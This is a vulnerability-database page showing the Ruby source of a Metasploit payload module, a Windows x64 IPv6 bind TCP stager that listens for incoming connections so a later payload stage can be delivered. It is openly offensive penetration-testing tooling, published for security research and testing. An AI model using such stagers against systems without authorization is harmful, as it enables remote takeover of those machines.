Lucene search

K

Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager

🗓️ 25 May 2015 01:28:21Reported by sf <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 8 Views

Windows x64 IPv6 Bind TCP Stager: Listen for an IPv6 connection (Windows x64

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule

  CachedSize = 485

  include Msf::Payload::Stager
  include Msf::Payload::Windows::BindTcp_x64

  def self.handler_type_alias
    "bind_ipv6_tcp"
  end

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Windows x64 IPv6 Bind TCP Stager',
      'Description'   => 'Listen for an IPv6 connection (Windows x64)',
      'Author'        => [ 'sf' ],
      'License'       => MSF_LICENSE,
      'Platform'      => 'win',
      'Arch'          => ARCH_X64,
      'Handler'       => Msf::Handler::BindTcp,
      'Convention'    => 'sockrdi',
      'Stager'        => { 'RequiresMidstager' => false }
      ))
  end

  def use_ipv6
    true
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
25 May 2015 01:21Current
0.1Low risk
Vulners AI Score0.1
8
.json
Report